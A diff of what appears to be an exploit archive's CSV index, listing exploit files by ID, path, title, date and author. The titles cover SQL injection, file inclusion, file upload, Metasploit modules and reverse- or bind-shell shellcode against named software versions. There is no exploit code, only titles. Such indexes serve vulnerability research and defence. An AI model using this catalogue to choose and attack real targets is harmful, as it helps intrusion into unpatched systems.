38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload (Metasploit)",2015-12-03,Metasploit,windows,remote,7777
38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution (Metasploit)",2015-12-08,Metasploit,php,remote,80 38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution (Metasploit)",2015-12-08,Metasploit,php,remote,80
@ -16345,6 +16328,7 @@ id,file,description,date,author,platform,type,port
42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0 42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0 42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -17840,7 +17824,7 @@ id,file,description,date,author,platform,type,port
3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion",2007-02-16,ajann,php,webapps,0
3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0 3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0
3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Blind SQL Injection",2007-02-16,DNX,php,webapps,0 3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Blind SQL Injection",2007-02-16,DNX,php,webapps,0
3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - 'root' Local File Inclusion",2007-02-16,Snip0r,php,webapps,0
3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0
3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0 3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0
3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0
@ -23477,7 +23461,7 @@ id,file,description,date,author,platform,type,port
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0
12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0
12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0 12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
@ -24339,6 +24323,7 @@ id,file,description,date,author,platform,type,port
14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0
14558,platforms/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps,0 14558,platforms/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps,0
14541,platforms/php/webapps/14541.txt,"WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0 14541,platforms/php/webapps/14541.txt,"WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0
14547,platforms/windows/webapps/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow",2010-08-03,"Nahuel Riva",windows,webapps,0
14557,platforms/php/webapps/14557.txt,"sX-Shop - 'view_image.php' SQL Injection",2010-08-05,secret,php,webapps,0 14557,platforms/php/webapps/14557.txt,"sX-Shop - 'view_image.php' SQL Injection",2010-08-05,secret,php,webapps,0
14556,platforms/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0 14556,platforms/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0
14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id=' SQL Injection",2010-08-05,secret,php,webapps,0 14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id=' SQL Injection",2010-08-05,secret,php,webapps,0
@ -24397,6 +24382,7 @@ id,file,description,date,author,platform,type,port
14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0
14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0
14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0
14818,platforms/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",linux,webapps,0
14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0 14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0
@ -25846,6 +25832,7 @@ id,file,description,date,author,platform,type,port
18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0 18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0
18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Directory Traversal",2012-03-19,rgod,jsp,webapps,0 18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Directory Traversal",2012-03-19,rgod,jsp,webapps,0
18631,platforms/php/webapps/18631.txt,"OneForum - 'topic.php' SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0 18631,platforms/php/webapps/18631.txt,"OneForum - 'topic.php' SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0
18932,platforms/linux/webapps/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution",2012-05-26,muts,linux,webapps,0
18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - Cross-Site Request Forgery",2012-03-21,iqzer0,hardware,webapps,0 18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - Cross-Site Request Forgery",2012-03-21,iqzer0,hardware,webapps,0
18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / Cross-Site Scripting",2012-03-21,LiquidWorm,php,webapps,0 18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / Cross-Site Scripting",2012-03-21,LiquidWorm,php,webapps,0
18644,platforms/php/webapps/18644.txt,"vBShout - Persistent Cross-Site Scripting",2012-03-22,ToiL,php,webapps,0 18644,platforms/php/webapps/18644.txt,"vBShout - Persistent Cross-Site Scripting",2012-03-22,ToiL,php,webapps,0
@ -26098,6 +26085,7 @@ id,file,description,date,author,platform,type,port
20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0
20062,platforms/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 20062,platforms/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0
20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0 20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0
20064,platforms/linux/webapps/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,linux,webapps,0
20083,platforms/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20083,platforms/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",php,webapps,0
20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0
20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps,0 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps,0
@ -27213,6 +27201,7 @@ id,file,description,date,author,platform,type,port
23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0 23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0
23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0 23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0
23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps,0 23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps,0
23875,platforms/windows/webapps/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,webapps,0
23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0 23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0
23886,platforms/windows/webapps/23886.txt,"Simple Web Server 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 23886,platforms/windows/webapps/23886.txt,"Simple Web Server 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0
23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0
@ -28472,6 +28461,7 @@ id,file,description,date,author,platform,type,port
26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0 26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0
26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0
26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
26012,platforms/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,webapps,80
26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps,0 26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps,0
@ -29499,6 +29489,7 @@ id,file,description,date,author,platform,type,port
27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0
27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0
27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0 27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0
27320,platforms/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,webapps,0
27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0
27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_index.php 'Username' Parameter Cross-Site Scripting",2006-02-27,botan,php,webapps,0 27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_index.php 'Username' Parameter Cross-Site Scripting",2006-02-27,botan,php,webapps,0
27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_onfly.php Cross-Site Scripting",2006-02-27,botan,php,webapps,0 27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_onfly.php Cross-Site Scripting",2006-02-27,botan,php,webapps,0
@ -31465,8 +31456,8 @@ id,file,description,date,author,platform,type,port
30002,platforms/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 30002,platforms/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0
30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/Management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/Management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' 'g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' 'g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0
@ -31646,6 +31637,7 @@ id,file,description,date,author,platform,type,port
30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30472,platforms/linux/webapps/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,webapps,7071
30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
30478,platforms/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,php,webapps,80 30478,platforms/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,php,webapps,80
@ -33261,6 +33253,7 @@ id,file,description,date,author,platform,type,port
33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69 33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69
33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80 33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80
33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 - Information Disclosure",2009-11-06,"Daniel King",jsp,webapps,0 33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 - Information Disclosure",2009-11-06,"Daniel King",jsp,webapps,0
33578,platforms/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,webapps,0
33097,platforms/php/webapps/33097.txt,"Programs Rating - rate.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0 33097,platforms/php/webapps/33097.txt,"Programs Rating - rate.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0
33098,platforms/php/webapps/33098.txt,"Programs Rating - postcomments.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0 33098,platforms/php/webapps/33098.txt,"Programs Rating - postcomments.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0
33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 - Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0 33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 - Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0
@ -33594,6 +33587,7 @@ id,file,description,date,author,platform,type,port
33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0
33760,platforms/multiple/webapps/33760.txt,"Multiple Products - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0 33760,platforms/multiple/webapps/33760.txt,"Multiple Products - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0
33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps,0 33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps,0
33740,platforms/hardware/webapps/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,webapps,0
33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0
33759,platforms/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0 33759,platforms/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0
33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0
@ -34622,6 +34616,7 @@ id,file,description,date,author,platform,type,port
